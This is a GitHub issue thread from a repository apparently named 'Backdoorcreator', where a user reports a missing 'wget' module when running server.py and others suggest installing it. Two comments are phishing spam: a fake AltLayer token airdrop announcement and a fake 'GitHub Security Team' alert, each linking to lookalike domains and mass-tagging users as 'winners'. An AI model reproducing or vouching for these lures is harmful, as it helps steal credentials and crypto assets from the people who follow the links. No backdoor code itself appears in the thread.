### ISSUE TITLE
problem in python3 server.py

### ISSUE THREAD

**Issue by LupinArssenejjj** [krishpranav/Backdoorcreator#4]
Traceback (most recent call last):
  File "/data/data/com.termux/files/home/Backdoorcreator/server.py", line 4, in <module>
    from wget import download
ModuleNotFoundError: No module named 'wget'

**Comment by bubon4ik222** [comment]
> Traceback (most recent call last):
> 
>   File "/data/data/com.termux/files/home/Backdoorcreator/server.py", line 4, in <module>
> 
>     from wget import download
> 
> ModuleNotFoundError: No module named 'wget'

**Comment by n1ceh4t** [comment]
This error indicates that you are missing required python modules. Try installing the wget module for python 3 via `python3 -m pip install wget` command

**Comment by krishpranav** [comment]
does this error gets resolved? or are you still facing this error @LupinArssenejjj 

> Traceback (most recent call last): File "/data/data/com.termux/files/home/Backdoorcreator/server.py", line 4, in from wget import download ModuleNotFoundError: No module named 'wget'

**Comment by krishpranav** [comment]
## waiting for your response for getting this issue closed.

**Comment by murali0286** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @gkhncns, @droibit, @MiranKm, @ziadtamim, @porcow, @llsc12, @scattershot-code, @eyeplum, @tarun2502, @anezjonathan, @MiguelChiang, @felipemeamaral, @noaheverett, @fish-yan, @jgonfer, @ssfhljy, @jamalalayq, @loudmouth, @312362115, @wizplan

**Comment by 3CTec** [comment]
# Urgent: GitHub Account Security Alert! 🚨

Hello,

We've detected an unusual access to your **GitHub account**. To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

2. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your account.

*If you did not initiate this access, please contact us immediately.*

Best Regards,  
**GitHub Security Team**


Winners: @leostc, @CtrlJone, @nykbear, @mttcrsp, @shuto-S, @zcharter, @jfortmann, @imeldaloei, @801sanae, @NSPratik, @thomassenkman, @DaveChambers, @joshblack, @iJoeychang, @lucasecf, @showgp, @Jaymon, @GHeminghui, @houseme, @zenangst

**Comment by krishpranav** [comment]
closing as there was no response regarding the issue.
